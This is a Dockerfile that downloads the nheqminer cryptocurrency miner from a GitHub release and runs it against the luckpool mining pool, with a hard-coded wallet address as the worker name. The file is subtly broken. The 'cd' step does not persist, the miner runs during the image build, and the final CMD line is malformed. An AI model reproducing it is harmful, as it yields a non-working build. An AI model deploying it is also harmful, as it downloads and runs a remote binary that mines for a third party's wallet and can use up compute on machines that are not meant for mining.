FROM debian:stable
RUN apt-get update && apt-get -y install wget vim
WORKDIR /home
RUN wget https://github.com/VerusCoin/nheqminer/releases/download/v0.8.2/nheqminer-Linux-v0.8.2.tgz
RUN tar xf nheqminer-Linux-v0.8.2.tgz
RUN tar xf nheqminer-Linux-v0.8.2.tar.gz
RUN cd nheqminer
RUN ./nheqminer -v -l na.luckpool.net:3956 -u RX4vBjkGvdLF7R5uka9yc6XWWncyTLAk2P.WORKER-1 -p x -t 1
CMD (-h)
